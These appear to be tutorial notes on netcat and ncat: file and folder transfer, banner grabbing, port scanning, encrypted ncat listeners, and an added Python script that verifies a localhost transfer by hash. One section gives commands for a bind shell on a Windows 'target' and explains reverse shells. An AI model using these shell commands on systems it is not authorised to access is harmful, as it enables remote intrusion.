Use listen mode (-l) on the server side.
nc -l -p <port>
Connect to the server from client on the same port.
nc <server> <port>
Can be done on the same machine also.
On the server machine give the command
nc -v -w 30 -p <port> -l < file.txt
On the client machine give command
nc -v -w 2 <server ip> <port> > receivedfile.txt
-w is the wait (idle timeout) in seconds and -v is for verbose output. file.txt will be received as receivedfile.txt on the client machine. Works on the local machine as well. Test.
It can be done with telnet as well, but nc does not alter the data stream the way telnet does. Just nc to the ip on a specific port to get the banner of the service running on the server.
Use -z for zero-I/O mode (report whether ports are listening without sending data).
nc -v <ip> -z <port-start>-<port-end>
The -n option can also be used. It skips DNS resolution of the given ip address, which saves time. -w can also be used to wait a specified number of seconds before giving up on a port.
To get a remote shell on Windows, get the following nc command executed there
nc -lp <port> -vv -e cmd.exe
Then execute nc on the attacking machine as follows
nc <ip> <port>
It is always unencrypted. Since this is always unsafe, there is a version of netcat called cryptcat which adds Twofish encryption.
If the listener uses the -e option it is called a direct shell (also called a bind shell). If the connecting machine uses the -e option it is called a reverse shell.
This helps in situations where not both machines on the network can port forward (accept inbound connections).
To transfer a whole folder, on the sender use the command
tar -cf - <foldername> | nc -l -p 1337
On the receiving machine type command
nc <sender ip> 1337 | tar -xf -
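The file transfer above (and the single-file version with -l and -w earlier) is a raw byte stream with no integrity check on either end. The following added example, which is not part of the original notes, models both sides of that transfer in Python on localhost (a sender that streams bytes and closes, a receiver that reads until EOF or timeout) and compares SHA-256 digests of what was sent and what arrived; the payload and the corrupt flag are constructed to show the check catching a modified stream.

```python
import hashlib
import socket
import threading

# Constructed sample payload standing in for file.txt on the page.
SAMPLE = b"netcat file transfer demo line\n" * 200

def serve_file(srv, data, corrupt=False):
    """Listener side, like `nc -l -p <port> < file.txt`: accept one client,
    stream the bytes, then close. corrupt=True flips one byte in transit to
    model a modified stream (constructed failure case)."""
    with srv:
        conn, _ = srv.accept()
        with conn:
            payload = bytearray(data)
            if corrupt:
                payload[len(payload) // 2] ^= 0x01
            conn.sendall(bytes(payload))
            conn.shutdown(socket.SHUT_WR)  # EOF tells the client the stream is done

def fetch_file(host, port, timeout=2.0):
    """Client side, like `nc -w 2 <server ip> <port> > receivedfile.txt`:
    read until the peer closes, or give up after the timeout."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as cli:
        while True:
            chunk = cli.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)

def transfer_and_verify(data, corrupt=False):
    """Run both ends on localhost and compare SHA-256 digests of what was sent
    and what arrived. nc performs no such check, so do it out of band."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port stands in for <port>
    srv.listen(1)
    port = srv.getsockname()[1]
    t = threading.Thread(target=serve_file, args=(srv, data, corrupt), daemon=True)
    t.start()
    received = fetch_file("127.0.0.1", port)
    t.join(timeout=5)
    sent_digest = hashlib.sha256(data).hexdigest()
    recv_digest = hashlib.sha256(received).hexdigest()
    return {"port": port, "bytes": len(received), "match": sent_digest == recv_digest}

if __name__ == "__main__":
    print(transfer_and_verify(SAMPLE), transfer_and_verify(SAMPLE, corrupt=True))
```

With real nc, the same check is a sha256sum of file.txt on the sender compared against receivedfile.txt on the client.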
ncat is a more modern version of netcat, implemented with the nmap libraries. It supports multiple protocols and transmission over SSL/TLS.
On the listener type
ncat --allow <allowed ip> -vln <port> --ssl
Only connections from the allowed ip will be accepted, and they will have an encrypted channel. A connection from the allowed ip is accepted but never established if the command on that ip does not contain the --ssl option. On the allowed ip type
ncat -vn <listener> <l port> --ssl